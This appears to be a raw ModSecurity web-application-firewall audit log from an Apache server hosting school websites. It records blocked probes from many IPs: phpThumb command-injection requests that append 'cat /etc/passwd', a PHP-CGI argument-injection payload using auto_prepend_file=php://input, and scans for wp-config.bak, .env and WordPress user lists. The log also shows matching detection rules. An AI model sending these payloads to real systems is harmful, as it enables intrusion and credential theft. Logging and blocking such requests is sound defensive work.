SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5a26f77e-E-- --5a26f77e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578351223926 1807 (- - -) Stopwatch2: 1745578351223926 1807; combined=598, p1=412, p2=159, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a26f77e-Z-- --8f63eb44-A-- [25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53QAAAA0 103.236.140.4 44712 103.236.140.4 8181 --8f63eb44-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270233 --8f63eb44-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8f63eb44-E-- --8f63eb44-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578351422077 1849 (- - -) Stopwatch2: 1745578351422077 1849; combined=600, p1=428, p2=140, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f63eb44-Z-- --1da3fa35-A-- [25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53gAAAAk 103.236.140.4 44712 103.236.140.4 8181 --1da3fa35-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363698 --1da3fa35-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1da3fa35-E-- --1da3fa35-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578351620539 1492 (- - -) Stopwatch2: 1745578351620539 1492; combined=511, p1=362, p2=122, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1da3fa35-Z-- --d2ff397d-A-- [25/Apr/2025:17:52:31 +0700] aAtpb_Ku9d5eAb6Kn98pewAAAMM 103.236.140.4 44726 103.236.140.4 8181 --d2ff397d-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363701 --d2ff397d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d2ff397d-E-- --d2ff397d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578351819239 2330 (- - -) Stopwatch2: 1745578351819239 2330; combined=588, p1=398, p2=157, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2ff397d-Z-- --e4767368-A-- [25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfAAAAMY 103.236.140.4 44726 103.236.140.4 8181 --e4767368-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270239 --e4767368-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e4767368-E-- --e4767368-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578352018398 1788 (- - -) Stopwatch2: 1745578352018398 1788; combined=539, p1=382, p2=129, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4767368-Z-- --e1bd7164-A-- [25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfQAAAMw 103.236.140.4 44726 103.236.140.4 8181 --e1bd7164-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363704 --e1bd7164-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e1bd7164-E-- --e1bd7164-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578352216803 1486 (- - -) Stopwatch2: 1745578352216803 1486; combined=499, p1=346, p2=124, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1bd7164-Z-- --11d29167-A-- [25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfgAAANA 103.236.140.4 44726 103.236.140.4 8181 --11d29167-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270242 --11d29167-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --11d29167-E-- --11d29167-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578352415231 1559 (- - -) Stopwatch2: 1745578352415231 1559; combined=594, p1=384, p2=182, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11d29167-Z-- --6b8f3b08-A-- [25/Apr/2025:17:57:01 +0700] aAtqfeOdEP6frSVs8Cp6CwAAABE 103.236.140.4 45768 103.236.140.4 8181 --6b8f3b08-B-- GET /wp-config.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 5.161.58.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.161.58.65 X-Forwarded-Proto: http Connection: close Accept: */* --6b8f3b08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b8f3b08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.bak" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578621762024 950 (- - -) Stopwatch2: 1745578621762024 950; combined=406, p1=363, p2=0, p3=0, p4=0, p5=43, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b8f3b08-Z-- --ea4a3d31-A-- [25/Apr/2025:19:20:20 +0700] aAt-BD8HMZgF-3Y3GtGGJgAAAE4 103.236.140.4 36820 103.236.140.4 8181 --ea4a3d31-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --ea4a3d31-C-- --ea4a3d31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea4a3d31-E-- --ea4a3d31-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745583620207834 5365 (- - -) Stopwatch2: 1745583620207834 5365; combined=3531, p1=572, p2=2928, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea4a3d31-Z-- --f446c334-A-- [25/Apr/2025:19:44:31 +0700] aAuDr_Ku9d5eAb6Kn98xCgAAANU 103.236.140.4 42440 103.236.140.4 8181 --f446c334-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 35.204.172.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.204.172.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f446c334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f446c334-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745585071480172 3040 (- - -) Stopwatch2: 1745585071480172 3040; combined=1302, p1=440, p2=830, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f446c334-Z-- --0bb5ac04-A-- [25/Apr/2025:19:50:18 +0700] aAuFCuXF4ZX3hX-IbN7roQAAAIU 103.236.140.4 57112 103.236.140.4 8181 --0bb5ac04-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 193.218.7.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.218.7.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0bb5ac04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb5ac04-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745585418697492 3098 (- - -) Stopwatch2: 1745585418697492 3098; combined=1328, p1=457, p2=839, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bb5ac04-Z-- --54c6dc6c-A-- [25/Apr/2025:19:53:20 +0700] aAuFwD8HMZgF-3Y3GtGMHAAAAFM 103.236.140.4 37904 103.236.140.4 8181 --54c6dc6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.231.89.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.231.89.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --54c6dc6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54c6dc6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745585600476063 2103 (- - -) Stopwatch2: 1745585600476063 2103; combined=1184, p1=409, p2=749, p3=0, p4=0, p5=26, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54c6dc6c-Z-- --77d91a32-A-- [25/Apr/2025:20:37:09 +0700] aAuQBfKu9d5eAb6Kn99aQQAAAM0 103.236.140.4 37902 103.236.140.4 8181 --77d91a32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.106.192.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.106.192.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --77d91a32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77d91a32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745588229541149 3678 (- - -) Stopwatch2: 1745588229541149 3678; combined=1804, p1=538, p2=1226, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77d91a32-Z-- --1e64335e-A-- [25/Apr/2025:20:47:18 +0700] aAuSZvKu9d5eAb6Kn99f3wAAAMo 103.236.140.4 56358 103.236.140.4 8181 --1e64335e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.191.185.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.191.185.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1e64335e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e64335e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745588838324473 2618 (- - -) Stopwatch2: 1745588838324473 2618; combined=1266, p1=427, p2=810, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e64335e-Z-- --36657c28-A-- [25/Apr/2025:21:22:33 +0700] aAuaqT8HMZgF-3Y3GtGy9gAAAEw 103.236.140.4 36276 103.236.140.4 8181 --36657c28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G925F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --36657c28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36657c28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] 